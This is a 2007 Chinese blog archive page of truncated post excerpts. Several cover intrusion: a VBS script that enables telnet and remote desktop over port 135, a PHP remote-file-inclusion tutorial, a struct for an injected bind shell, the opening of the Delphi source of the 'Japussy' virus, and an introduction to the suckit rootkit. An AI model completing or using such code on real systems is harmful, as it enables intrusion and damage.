您正在查看 "默认分类" 分类下的文章
2007-09-20 09:20
一段 VBS 脚本,作用是 :可以通过135端口开特telnet,也就是说只要开了135有了系统管理员帐号密码连3389都可以开,一共有三个功能:开3389,开telnet,开关机...
on error resume next
set xsjd=wscript.stdout
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
change=wsc |
2007-09-15 21:43
2007-09-15 21:35
php远程文件包含漏洞
在这篇文章里我会告诉php远程文件包含漏洞的原理,初涉程序员的人必看。
首先的问题是,什么才是”远程文件包含漏洞“?简要的回答是服务器通过php的任意文件包含过滤不严,从而去执行一个恶意文件,这是个程序员过滤上的问题,请记住,所有的cgi程序都有这样的bug。
1.找出bug:
为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的文件。在php里,我们使用include()函数, |
2007-09-15 21:22
//参数结构 ;
typedef struct _RemotePara{
DWORD dwLoadLibrary;
DWORD dwFreeLibrary;
DWORD dwGetProcAddress;
DWORD dwGetModuleHandle;
DWORD dwWSAStartup;
DWORD dwSocket;
DWORD dwhtons;
DWORD dwbind;
DWORD dwlisten;
DWORD dwaccept;
DWORD dwsend;
DWORD dwrecv;
DWORD dwclosesocket;
DWORD dwCreateProcessA;
DWORD dwPeekNamedPipe;
DWORD dwWriteFile;
DWORD dwReadFile;
DWORD dwCloseHandle;
DWORD dwCreateP |
2007-09-15 21:16
program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = $12EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
I |
2007-09-14 17:07
配置安全的Linux操作系统的一点经验........
一、磁盘分区
1、如果是新安装系统,对磁盘分区应考虑安全性:
1)根目录(/)、用户目录(/home)、临时目录(/tmp)和/var目录应分开到不同的磁盘分区;
2)以上各目录所在分区的磁盘空间大小应充分考虑,避免因某些原因造成分区空间用完而导致系统崩溃;
2、对于/tmp和/var目录所在分区,大多数情况下不需要有suid属性的程序,所以应为这些分区添加nosuid属性;
方法一:修改/etc/fstab文件,添加nosuid |
2007-09-13 08:52
作者 wzt
联系方式 wzt@xsec.org
个人网站 http://tthacker.cublog.cn http://xsec.org
一.简介.
我们经常可以从一些搞linux入侵的朋友那里听到他们讨论sk这个rootkit,其实sk的全称是suckit,意为super user control kit。suckit这个程序可以说是目前运行于Linux 2.4内核下最好的rootkit了。
关键字:Linux后门 Rootkit Linux入侵 suckit adore-ng ELF感染
1、背景知识:
什么是LKM:LKM英 |
2007-09-09 09:02
2007-09-09 08:55
1.遇到乞讨者:遇到要钱的就给他(她)点饭,遇到要饭的就给他 (她)点钱
2.上车遇到老弱病残、孕妇:让座的时候别动声色,也别大张旗鼓。站起来用身体挡住其他人留 出 空位子给需要的人,然后装作下车走远点。人太多实在走不远,人家向你表示谢意的时候  一下。
3. 雨 雪的 时候、天冷的傍晚或者是雪天的傍晚,遇到卖菜的、卖水果的、卖报纸的剩的不多了又不能回家,能全 买就 全买,
不能全买就买一份,反正吃 |
2007-09-09 08:54
一、先看下面的一个贴子:
Oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点:
1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库,其大小可到几百千兆,可充分利用硬件设备。支持大量用户同时在同一数据上执行各种数据应用,并使数据争用最小,保证数据一致性。系统维护具有高的性能,Oracle每天可连续24小时工作,正常的系统操作(后备或个别计算机系统故障) 不会中断数据库的使用。可控制数据库数据的可用性,可在数据库级或在子数 |
|
| 
